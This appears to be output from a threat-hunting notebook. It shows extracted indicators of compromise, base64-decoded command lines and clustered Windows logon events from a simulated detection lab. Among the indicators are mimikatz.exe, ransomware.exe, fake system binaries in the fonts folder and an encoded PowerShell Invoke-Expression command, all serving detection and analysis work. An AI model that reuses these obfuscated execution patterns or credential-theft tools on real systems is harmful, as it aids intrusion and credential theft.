| 96 | windows_path | c:\windows\softwaredistribution\cscript.exe | 80 |
| 97 | windows_path | .\lsass.exe | 80 |
| 98 | windows_path | c:\windows\system32\wscript.exe | 82 |
| 99 | windows_path | c:\windows\system32\inetsrv\appcmd | 83 |
| 100 | windows_path | C:\inetpub\wwwroot | 83 |
| 101 | windows_path | c:\Diagnostics\UserTmp\2840.exe | 84 |
| 102 | windows_path | c:\Diagnostics\UserTmp\a_keygen.exe | 85 |
| 103 | windows_path | c:\Diagnostics\UserTmp\bittorrent.exe | 87 |
| 104 | windows_path | c:\Diagnostics\UserTmp\netsh.exe | 88 |
| 105 | windows_path | c:\Diagnostics\UserTmp\ransomware.exe | 90 |
| 106 | windows_path | \\server\payload.dll | 92 |
| 107 | windows_path | C:\Users\Administrator\AppData\Roaming\{RANDOM}.txt | 94 |
| 108 | ipv4 | 127.0.0.1 | 102 |
| 109 | url | http://127.0.0.1/ | 102 |
| 110 | windows_path | .\reg | 103 |
| 111 | windows_path | \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\MyNastySvcHostConfig | 103 |
| 112 | windows_path | .\reg | 104 |
| 113 | windows_path | \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\MyNastySvcHostConfig | 104 |
| 114 | windows_path | C:\Users\MSTICA~1\AppData\Local\Temp\hd.exe | 105 |
| 115 | windows_path | \\.\pipe\blahtest | 107 |
| 116 | windows_path | .\reg.exe | 108 |
| 117 | windows_path | \console | 108 |
| 118 | windows_path | c:\windows\fonts\csrss.exe | 109 |
| 119 | windows_path | c:\windows\fonts\conhost.exe | 110 |
| 120 | windows_path | .\mimikatz.exe | 111 |
| 121 | windows_path | .\rundll32.exe | 112 |
| 122 | windows_path | c:\windows\fonts\conhost.exe | 112 |
| 123 | windows_path | c:\windows\fonts\csrss.exe | 113 |
| 124 | windows_path | .\regsvr32 | 113 |
| 125 | windows_path | c:\Diagnostics\UserTmp | 115 |
| 126 | windows_path | c:\Diagnostics\WindowsSimulateDetections.bat | 115 |
| 127 | windows_path | C:\Windows\System32\win32calc.exe | 116 |
 | full_decoded_string | original_string | decoded_string | input_bytes | file_hashes
---|---|---|---|---|---|
0 | .\powershell -enc <decoded type='string' name='[None]' index='1' depth='1'>$\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000... | JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8A... | $\u0000t\u0000 \u0000=\u0000 \u0000'\u0000d\u0000i\u0000r\u0000'\u0000;\u0000\r\u0000\n\u0000&\u0000 \u0000(\u0000'\u0000I\u0000n\u0000v\u0000o\u0000k\u0000e\u0000'\u0000+\u0000'\u0000-\u0000E\u0000x\u0000p\u0000r\u0000e\u0000s\u0000s\u0000i\u0000o\u0000n\u0000'\u0000)\u0000 \u0000$\u0000t\u0000 | b"$\x00t\x00 \x00=\x00 \x00'\x00d\x00i\x00r\x00'\x00;\x00\r\x00\n\x00&\x00 \x00(\x00'\x00I\x00n\... | {'md5': '6cd1486db221e532cc2011c9beeb4ffc', 'sha1': '6e485467d7e06502046b7c84a8ef067cfe1512ad', ...
1 | cmd /c "echo # <decoded type='string' name='[None]' index='1' depth='1'>ꙩ榚骦ꙩ榚骦ꙩ榚骦ꙩ榚骦</decoded> ... | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | ꙩ榚骦ꙩ榚骦ꙩ榚骦ꙩ榚骦 | b'i\xa6\x9ai\xa6\x9ai\xa6\x9ai\xa6\x9ai\xa6\x9ai\xa6\x9ai\xa6\x9ai\xa6\x9a' | {'md5': '9a45b2520e930dc9186f6d93a7798a13', 'sha1': 'f526c90fa0744e3a63d84421ff25e3f5a3d697cb', ...
2 | cmd /c "echo # <decoded type='string' name='[None]' index='1' depth='1'>ꙩ榚骦ꙩ榚骦ꙩ榚骦ꙩ榚骦</decoded> ... | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa | ꙩ榚骦ꙩ榚骦ꙩ榚骦ꙩ榚骦 | b'i\xa6\x9ai\xa6\x9ai\xa6\x9ai\xa6\x9ai\xa6\x9ai\xa6\x9ai\xa6\x9ai\xa6\x9a' | {'md5': '9a45b2520e930dc9186f6d93a7798a13', 'sha1': 'f526c90fa0744e3a63d84421ff25e3f5a3d697cb', ...
3 | implant.exe <decoded type='string' name='[None]' index='1' depth='1'>埳펝᩷꽿해㣮컡槶믎彷絶岿</decoded> | 81ed03caf6901e444c72ac67d192fb9c | 埳펝᩷꽿해㣮컡槶믎彷絶岿 | b'\xf3W\x9d\xd3w\x1a\x7f\xaft\xd5\xee8\xe1\xce\xf6i\xce\xbbw_v}\xbf\\' | {'md5': '1c8cc6299bd654bbcd85710968d6a87c', 'sha1': '55377391141f59a2ff5ae4765d9f0b4438adfd73', ...
 | IoCType | Observable | SourceIndex
---|---|---|---|
0 | windows_path | .\powershell | 0
 | TenantId | Account | EventID | TimeGenerated | SourceComputerId | Computer | SubjectUserName | SubjectDomainName | SubjectUserSid | TargetUserName | TargetDomainName | TargetUserSid | TargetLogonId | LogonProcessName | LogonType | AuthenticationPackageName | Status | IpAddress | WorkstationName | AccountNum | LogonHour | Clustered | ClusterId | ClusterSize | LastEventTime
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4624 | 2019-01-15 05:15:02.980 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | MSTICAlertsWin1$ | WORKGROUP | S-1-5-18 | MSTICAdmin | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | 0xfaac27 | Advapi | 4 | Negotiate | | - | MSTICAlertsWin1 | 2319 | 5 | True | 0.0 | 2.0 | 2019-01-15 04:28:33.090
1 | 802d39e1-9d70-404d-832c-2de5e2478eda | NT AUTHORITY\SYSTEM | 4624 | 2019-01-15 05:15:04.503 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | MSTICAlertsWin1$ | WORKGROUP | S-1-5-18 | SYSTEM | NT AUTHORITY | S-1-5-18 | 0x3e7 | Advapi | 5 | Negotiate | | - | - | 1484 | 5 | True | 1.0 | 11.0 | 2019-01-15 03:09:51.707
2 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\adm1nistrator | 4624 | 2019-01-15 05:15:06.363 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | - | - | S-1-0-0 | adm1nistrator | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-1066 | 0xfb5ee6 | NtLmSsp | 3 | NTLM | | fe80::38dc:e4a9:61bd:b458 | MSTICAlertsWin1 | 2799 | 5 | False | -1.0 | 1.0 | 2019-01-15 05:15:06.363
Account | LogonType | TimeGenerated
---|---|---|
MSTICAlertsWin1\MSTICAdmin | 4 | 2
MSTICAlertsWin1\adm1nistrator | 3 | 1
NT AUTHORITY\SYSTEM | 5 | 11
 | TenantId | Account | EventID | TimeGenerated | SourceComputerId | Computer | SubjectUserName | SubjectDomainName | SubjectUserSid | TargetUserName | TargetDomainName | TargetUserSid | TargetLogonId | LogonProcessName | LogonType | AuthenticationPackageName | Status | IpAddress | WorkstationName
---|